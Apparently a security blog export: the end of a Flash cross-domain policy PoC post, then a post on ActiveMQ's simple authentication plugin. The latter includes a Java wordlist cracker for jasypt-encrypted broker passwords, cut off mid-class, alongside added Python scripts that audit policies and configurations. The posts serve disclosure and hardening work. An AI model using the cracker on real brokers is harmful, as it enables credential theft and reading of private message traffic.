<div dir="ltr" style="line-height: 1; margin-bottom: 10pt; margin-top: 0pt;">
<div style="text-align: center;">
<span style="background-color: transparent; color: #4f81bd; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Figure 2: Image shows the sequence of requests during PoC execution</span></div>
<span style="background-color: transparent; color: #4f81bd; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The code example above uses hard-coded values for the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">readFrom</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">sendTo</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> parameters in the ActionScript, but you can have Flash retrieve these fields from your HTML page using ActionScript’s </span><a href="http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/external/ExternalInterface.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">ExternalInterface</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> class, or have the ActionScript fetch its targets from your attack server at runtime.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;"><br /></span></span>
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: large;">Conclusion</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Carefully analyze the proposed cross-domain application architecture from a security perspective before deploying new or updated cross-domain policy files, and keep the exposure minimal by avoiding overly permissive entries: a wildcard </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">domain="*"</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> entry, for instance, lets a SWF served from any site read your responses with the victim’s cookies, exactly as the PoC above does. Consider reviewing the following two documents from Adobe, which have extensive information on Adobe Flash Player security.</span></div>
<br />
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Cross-domain policy file usage recommendations for Flash Player </span><a href="http://www.adobe.com/devnet/flashplayer/articles/cross_domain_policy.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://www.adobe.com/devnet/flashplayer/articles/cross_domain_policy.html</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Adobe Flash Player 9 Security [PDF] </span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><a href="http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/devnet/flashplayer/pdfs/flash_player_9_security.pdf" style="text-decoration: none;">http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/devnet/flashplayer/pdfs/flash_player_9_security.pdf</a></span><a href="http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/devnet/flashplayer/pdfs/flash_player_9_security.pdf"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></a><br />
<br /></div>
</li>
</ol>
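To make the conclusion concrete, here is an added example (written for this edit, not part of the original post or of Adobe's tooling): a small Python script that parses a crossdomain.xml and flags the overly permissive entries discussed above. The two policy files it audits are constructed for the example and the host names in them are hypothetical; the element and attribute names are the real ones from Adobe's policy file specification.

```python
"""Flag overly permissive entries in a Flash cross-domain policy file (crossdomain.xml)."""
import xml.etree.ElementTree as ET

# Constructed sample policy for this example; the host names are hypothetical.
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
  <allow-access-from domain="*.example.com"/>
  <allow-access-from domain="partner.example.net"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
"""

# The same trust relationship expressed narrowly: one named partner host, headers restricted.
RESTRICTED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="partner.example.net"/>
  <allow-http-request-headers-from domain="partner.example.net" headers="X-Request-Id"/>
</cross-domain-policy>
"""


def audit_policy(xml_text, served_over_https=True):
    """Return (severity, message) findings for a cross-domain policy.

    served_over_https: whether the policy (and the data it guards) is served over TLS;
    only then does secure="false" matter.
    """
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        raise ValueError("root element is %r, not cross-domain-policy" % root.tag)

    findings = []

    # Meta-policy: "all" lets any policy file on the host (for example one dropped into a
    # user-upload directory) widen access beyond this master file.
    site_control = root.find("site-control")
    if site_control is not None and site_control.get("permitted-cross-domain-policies") == "all":
        findings.append(("MEDIUM", "site-control permits any policy file on the host, not just this master policy"))

    for entry in root.findall("allow-access-from"):
        domain = entry.get("domain", "")
        if domain == "*":
            findings.append(("HIGH", "allow-access-from domain=\"*\": any SWF on any site can read responses with the user's cookies"))
        elif domain.startswith("*."):
            findings.append(("MEDIUM", "allow-access-from %s: every subdomain is trusted, including any that hosts user content" % domain))
        # Flash defaults secure to true for HTTPS-served policies; "false" lets SWFs loaded
        # over plain HTTP read HTTPS data.
        if served_over_https and entry.get("secure", "true").lower() == "false":
            findings.append(("MEDIUM", "allow-access-from %s: secure=\"false\" lets plain-HTTP SWFs read HTTPS responses" % domain))

    for entry in root.findall("allow-http-request-headers-from"):
        domain, headers = entry.get("domain", ""), entry.get("headers", "")
        if domain == "*" or headers == "*":
            findings.append(("MEDIUM", "allow-http-request-headers-from domain=%s headers=%s: arbitrary cross-domain request headers are permitted" % (domain, headers)))

    return findings


def is_acceptable(xml_text, served_over_https=True):
    """True when no HIGH finding is present (MEDIUM findings still deserve a review)."""
    return not any(sev == "HIGH" for sev, _ in audit_policy(xml_text, served_over_https))


if __name__ == "__main__":
    for name, policy in (("permissive", PERMISSIVE_POLICY), ("restricted", RESTRICTED_POLICY)):
        print("== %s policy ==" % name)
        for severity, message in audit_policy(policy) or [("OK", "no permissive entries found")]:
            print("%-6s %s" % (severity, message))
```

Run it against the policy fetched from `https://target/crossdomain.xml`; a wildcard `allow-access-from` is the one finding that makes the attack in this post work from any origin, which is why it is the only HIGH, while the others widen the attack surface in narrower ways.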
</div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com16tag:blogger.com,1999:blog-4663432300421783651.post-24082686148391124672013-08-15T06:00:00.000-07:002013-08-23T21:59:13.543-07:00Security Considerations for ActiveMQ's Simple Authentication Plugin<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="WhitePaperBodycopy">
Apache ActiveMQ is a popular message broker that
has several security features to help secure its deployment. User or client authentication
is typically a very important security requirement for enterprise applications, and
ActiveMQ offers two plugin-based authentication mechanisms that need to be
explicitly enabled and sometimes even coded to your requirements.</div>
<br />
<span style="font-size: large;">ActiveMQ's Simple Authentication Plugin</span><br />
<div class="WhitePaperBodycopy">
In this blog post we will discuss ActiveMQ’s simple
authentication plugin and analyze it from a security perspective. ActiveMQ’s
simple authentication plugin can be enabled by adding the <span style="font-family: 'Courier New'; mso-bidi-font-family: 'Times New Roman';">simpleAuthenticationPlugin</span>
element to the broker configuration with the required user credentials, as shown
in the image below.</div>
<div class="WhitePaperBodycopy">
<br /></div>
<div class="WhitePaperBodycopy">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE_nmXpPY2FdxItlXN6WxQ2HDRu1Afn2y9XZ7xt0vU2tr2LoEXwCLy95ZugvZ_59m-UXq4gup30jHjfnAI85_u0LKcQ7T5xcRZK6eBZ9_exXc6VGIaqEXNZ2ywXpAtlK92TMgv9sXrs6s9/s1600/simpleAuthentication.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="77" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE_nmXpPY2FdxItlXN6WxQ2HDRu1Afn2y9XZ7xt0vU2tr2LoEXwCLy95ZugvZ_59m-UXq4gup30jHjfnAI85_u0LKcQ7T5xcRZK6eBZ9_exXc6VGIaqEXNZ2ywXpAtlK92TMgv9sXrs6s9/s400/simpleAuthentication.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image shows ActiveMQ's simpleAuthenticationPlugin</td></tr>
</tbody></table>
<div>
The above configuration has two users, admin and general, assigned to two different groups, admins and general respectively.</div>
<div>
<br /></div>
<div>
Now that we have seen a sample <span style="font-family: Courier New, Courier, monospace;">simpleAuthenticationPlugin </span>configuration, the following are the important security considerations when using this plugin.</div>
<div>
<ol style="text-align: left;">
<li>It stores usernames and passwords in the clear in the configuration file, so anyone with read access to that file, or to its backups, learns the broker credentials. A backup administrator, for example, is probably not meant to know the broker credentials, yet will be able to read them if <span style="font-family: Courier New, Courier, monospace;">simpleAuthenticationPlugin </span>is used in this fashion.</li>
<li>It offers no protection against password brute-force attacks: there is no provision to enforce account lockout after multiple failed login attempts. This can be devastating if someone brute-forces your admin password and can then read all messages passing through the broker and even administer the broker.</li>
</ol>
</div>
<div>
Of the two points above, ActiveMQ addresses only the first: it can encrypt the broker passwords with a password-based encryption (PBE) scheme before they are stored in the configuration files. The scheme is built on the open source <span style="font-family: Courier New, Courier, monospace;"><a href="http://www.jasypt.org/" target="_blank">jasypt</a></span> library’s <span style="font-family: Courier New, Courier, monospace;">StandardPBEStringEncryptor</span> class, so every password is encrypted under a single master password (jasypt calls it the encryption password) that the broker itself needs at startup; this is reversible encryption, not hashing. The image below shows the encrypted passwords for two ActiveMQ users.</div>
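As an added example (written for this edit, not code from the post or from the ActiveMQ project), the following Python audit reads a broker's activemq.xml together with its credentials properties file and reports the weaknesses just listed: passwords stored in the clear, ENC() values that are merely reversible, and the case where the jasypt master password itself is written inline next to the ciphertexts. The two configurations it inspects are constructed for the example and the ENC() payloads are placeholders, not real ciphertexts; the element and property names (simpleAuthenticationPlugin, authenticationUser, EnvironmentStringPBEConfig with password or passwordEnvName, Spring ${...} placeholders) are the ones ActiveMQ and jasypt actually use.

```python
"""Audit ActiveMQ's simpleAuthenticationPlugin credentials and the jasypt master password."""
import re
import xml.etree.ElementTree as ET

ENC_RE = re.compile(r"^ENC\(.+\)$")              # jasypt's ENC(<base64>) wrapper
PLACEHOLDER_RE = re.compile(r"^\$\{([^}]+)\}$")  # Spring ${property} placeholder

# Constructed activemq.xml fragment: one user in the clear, one behind a placeholder,
# and the jasypt master password written inline next to the ciphertexts it protects.
WEAK_ACTIVEMQ_XML = """<beans xmlns="http://www.springframework.org/schema/beans">
  <bean id="environmentVariablesConfiguration"
        class="org.jasypt.encryption.pbe.config.EnvironmentStringPBEConfig">
    <property name="algorithm" value="PBEWithMD5AndDES"/>
    <property name="password" value="secret123"/>
  </bean>
  <broker xmlns="http://activemq.apache.org/schema/core" brokerName="localhost">
    <plugins>
      <simpleAuthenticationPlugin>
        <users>
          <authenticationUser username="admin" password="admin" groups="admins"/>
          <authenticationUser username="general" password="${activemq.general.password}" groups="general"/>
        </users>
      </simpleAuthenticationPlugin>
    </plugins>
  </broker>
</beans>
"""

# Constructed credentials-enc.properties; the ENC() payloads are placeholders, not real ciphertexts.
WEAK_PROPERTIES = """# constructed for the example
activemq.general.password=ENC(c2FtcGxlQ2lwaGVydGV4dA==)
activemq.other.password=plaintext-service-password
"""

# The same configuration hardened: master password from an environment variable and every
# broker password behind a placeholder whose value is an ENC() string.
HARDENED_ACTIVEMQ_XML = WEAK_ACTIVEMQ_XML.replace(
    '<property name="password" value="secret123"/>',
    '<property name="passwordEnvName" value="ACTIVEMQ_ENCRYPTION_PASSWORD"/>',
).replace('password="admin"', 'password="${activemq.admin.password}"')
HARDENED_PROPERTIES = """activemq.admin.password=ENC(YWRtaW5DaXBoZXJ0ZXh0==)
activemq.general.password=ENC(c2FtcGxlQ2lwaGVydGV4dA==)
"""


def local_name(tag):
    """Strip the XML namespace: '{ns}bean' -> 'bean'."""
    return tag.rsplit("}", 1)[-1]


def parse_properties(text):
    """Minimal java.util.Properties reader: key=value lines, '#' and '!' comments."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def classify(value, props):
    """How a password value is stored: 'plaintext', 'encrypted' or 'unresolved'."""
    match = PLACEHOLDER_RE.match(value)
    if match:
        value = props.get(match.group(1))
        if value is None:
            return "unresolved"
    return "encrypted" if ENC_RE.match(value) else "plaintext"


def audit(activemq_xml, properties_text):
    """Return (severity, message) findings for a broker config and its properties file."""
    props = parse_properties(properties_text)
    findings = []
    for elem in ET.fromstring(activemq_xml).iter():
        name = local_name(elem.tag)
        if name == "authenticationUser":
            user = elem.get("username", "?")
            kind = classify(elem.get("password", ""), props)
            if kind == "plaintext":
                findings.append(("HIGH", f"user '{user}': password stored in the clear"))
            elif kind == "encrypted":
                findings.append(("MEDIUM", f"user '{user}': ENC() value is reversible by anyone holding the master password"))
            else:
                findings.append(("INFO", f"user '{user}': placeholder could not be resolved from the properties file"))
        elif name == "bean" and "jasypt" in elem.get("class", ""):
            # The jasypt config bean decides where the master password comes from.
            for prop in elem:
                if local_name(prop.tag) != "property":
                    continue
                if prop.get("name") == "password" and prop.get("value") is not None:
                    findings.append(("HIGH", f"bean '{elem.get('id')}': jasypt master password is stored inline next to the ciphertexts, so the encryption protects nothing"))
                elif prop.get("name") in ("passwordEnvName", "passwordSysPropertyName"):
                    findings.append(("INFO", f"bean '{elem.get('id')}': master password is read from {prop.get('value')} at startup"))
    for key, value in props.items():
        if "password" in key.lower() and classify(value, props) == "plaintext":
            findings.append(("HIGH", f"property '{key}': password stored in the clear"))
    return findings


if __name__ == "__main__":
    for label, xml_text, props_text in (("weak", WEAK_ACTIVEMQ_XML, WEAK_PROPERTIES),
                                        ("hardened", HARDENED_ACTIVEMQ_XML, HARDENED_PROPERTIES)):
        print(f"== {label} configuration ==")
        for severity, message in audit(xml_text, props_text):
            print(f"{severity:6} {message}")
```

A MEDIUM finding for an ENC() value becomes effectively HIGH when it sits beside an inline master password, which is why the audit reports both. Note that the hardened configuration still only moves the master password out of the file: nothing in this plugin adds lockout, so the second consideration above remains.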
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1EbFxVxVpKlX0fm7-ht2Y_zbOfAhQKLYQiZoc6wEtsy06R73YsVla4_ilnoEHOl8QWFfY3CexotPOGBfj25qukkMWQmbcCmBtwiVD30pZhIjId5ff6KcuayHLGzE32GxXFdUoh32C3AP8/s1600/activemq-encrypted-passwords.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="55" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1EbFxVxVpKlX0fm7-ht2Y_zbOfAhQKLYQiZoc6wEtsy06R73YsVla4_ilnoEHOl8QWFfY3CexotPOGBfj25qukkMWQmbcCmBtwiVD30pZhIjId5ff6KcuayHLGzE32GxXFdUoh32C3AP8/s400/activemq-encrypted-passwords.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">ActiveMQ's encrypted passwords<br />
<br />
<div style="text-align: left;">
<b><span style="font-size: large;"><br /></span></b>
<span style="font-size: large;">Decrypting ActiveMQ Passwords</span><br />
<span style="font-size: small;">Since the passwords are encrypted and not hashed, the original password can be recovered whenever the master password is available or can be brute-forced. So I wrote a Java class (code below) that subjects the encrypted strings to a dictionary attack from a wordlist, which also contained the correct password. It took 240 seconds for 1,000,000 (1 million) decryption attempts, a rate of about 4,166 candidate passwords per second on a single thread and a single core. Impressive, isn’t it? </span></div>
<div style="text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div style="text-align: left;">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_JUlPmYlxFWD2XkLxD6AC96SsfG0bMGThtMkOaaFS78_exj0c8ivVMppNZ57lxDViGOb7R9B6ZsVb5grgugxExMPSeCfGp7TneAx3-g82zf4W-kNh1LSe56NSX1M19FebTHYxJE7b_Nih/s1600/password-decrypted.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_JUlPmYlxFWD2XkLxD6AC96SsfG0bMGThtMkOaaFS78_exj0c8ivVMppNZ57lxDViGOb7R9B6ZsVb5grgugxExMPSeCfGp7TneAx3-g82zf4W-kNh1LSe56NSX1M19FebTHYxJE7b_Nih/s400/password-decrypted.png" width="400" /></a></td></tr>
<tr><td class="tr-caption">Image shows successful password decryption with our custom class<br />
<br />
<br />
<div style="text-align: left;">
<span style="font-family: inherit; font-size: small;"><span style="line-height: 115%;">The
ActiveMQ distribution itself can also decrypt passwords from its configuration
files (the <span style="font-family: Courier New, Courier, monospace;">activemq decrypt</span> command), and that can be scripted. However, it requires the
ActiveMQ binaries and may not be as fast. Additionally, every encrypted value in a configuration
is encrypted under the same master password, so once a single password is
cracked, the recovered master password decrypts all the other ones. That second ciphertext also
serves as a check: jasypt adds no integrity tag, so roughly one wrong candidate in a few hundred passes
the PKCS#5 padding check and "decrypts" to garbage instead of throwing; confirm a hit by decrypting
another value or by checking that the output is printable. You can also
use <a href="https://github.com/OpenSecurityResearch/jmsdigger" target="_blank">JMSDigger</a> to
perform batch password decryption.</span></span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="text-align: center;"></span></div>
<span style="font-family: inherit;"><br /></span>
<br />
<div style="text-align: left;">
<span style="font-family: inherit; font-size: small;">Example code: a wordlist attack against an ActiveMQ encrypted password (jasypt’s <span style="font-family: Courier New, Courier, monospace;">StandardPBEStringEncryptor</span> with its default PBEWithMD5AndDES algorithm)</span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial; border-collapse: collapse; border: none; font-size: 13px;">
<tbody>
<tr>
<td style="border: dashed windowtext 1.0pt; mso-border-alt: dashed windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 6.65in;" valign="top" width="638"><div class="MsoNormal" style="margin: 12pt 0in 0.0001pt; text-align: left;">
<b><span style="color: #7f0055; font-family: Consolas;">import</span></b><span style="font-family: Consolas;"> java.io.FileInputStream;</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<b><span style="color: #7f0055; font-family: Consolas;">import</span></b><span style="font-family: Consolas;"> java.io.FileNotFoundException;</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<b><span style="color: #7f0055; font-family: Consolas;">import</span></b><span style="font-family: Consolas;"> java.util.Scanner;</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<b><span style="color: #7f0055; font-family: Consolas;">import</span></b><span style="font-family: Consolas;">
org.jasypt.encryption.pbe.StandardPBEStringEncryptor;</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<b><span style="color: #7f0055; font-family: Consolas;">import</span></b><span style="font-family: Consolas;">
org.jasypt.exceptions.EncryptionOperationNotPossibleException;</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<b><span style="color: #7f0055; font-family: Consolas;">public</span></b><span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">class</span></b><span style="font-family: Consolas;"> AMQPasswordDecrypt {</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">private</span></b><span style="font-family: Consolas;"> String </span><span style="color: #0000c0; font-family: Consolas;">encryptedText</span><span style="font-family: Consolas;">;</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">private</span></b><span style="font-family: Consolas;"> StandardPBEStringEncryptor </span><span style="color: #0000c0; font-family: Consolas;">encryptor</span><span style="font-family: Consolas;">; </span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">public</span></b><span style="font-family: Consolas;"> AMQPasswordDecrypt(String
encryptedText) {</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">this</span></b><span style="font-family: Consolas;">.</span><span style="color: #0000c0; font-family: Consolas;">encryptedText</span><span style="font-family: Consolas;"> = encryptedText;</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">this</span></b><span style="font-family: Consolas;">.</span><span style="color: #0000c0; font-family: Consolas;">encryptor</span><span style="font-family: Consolas;"> = </span><b><span style="color: #7f0055; font-family: Consolas;">new</span></b><span style="font-family: Consolas;"> StandardPBEStringEncryptor();</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> }</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">public</span></b><span style="font-family: Consolas;"> String decrypt(String
decryptionString) {</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">try</span></b><span style="font-family: Consolas;"> {</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><span style="color: #0000c0; font-family: Consolas;">encryptor</span><span style="font-family: Consolas;"> = </span><b><span style="color: #7f0055; font-family: Consolas;">new</span></b><span style="font-family: Consolas;"> StandardPBEStringEncryptor();</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><span style="color: #0000c0; font-family: Consolas;">encryptor</span><span style="font-family: Consolas;">.setPassword(decryptionString);</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">return</span></b><span style="font-family: Consolas;">(</span><span style="color: #0000c0; font-family: Consolas;">encryptor</span><span style="font-family: Consolas;">.decrypt(</span><span style="color: #0000c0; font-family: Consolas;">encryptedText</span><span style="font-family: Consolas;">));</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> } </span><b><span style="color: #7f0055; font-family: Consolas;">catch</span></b><span style="font-family: Consolas;">
(EncryptionOperationNotPossibleException ex) {</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;">                  </span><span style="color: #3f7f5f; font-family: Consolas;">// Wrong password: jasypt throws when the padding check fails, so
return null to mark this candidate as unsuccessful</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">return</span></b><span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">null</span></b><span style="font-family: Consolas;">;</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> }</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> }</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">private</span></b><span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">static</span></b><span style="font-family: Consolas;"> </span><b><span style="color: #7f0055; font-family: Consolas;">void</span></b><span style="font-family: Consolas;">
showHelpAndExit() {</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
<span style="font-family: Consolas;"> System.</span><i><span style="color: #0000c0; font-family: Consolas;">out</span></i><span style="font-family: Consolas;">.println(</span><span style="color: #2a00ff; font-family: Consolas;">"Run as: \njava -cp <Classpath> AMQPasswordDecrypt
\n\t<EncryptedActiveMQPassword>
<FilePathForDecryptionStrings>"</span><span style="font-family: Consolas;">);</span><span style="font-family: Consolas;"><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: left;">
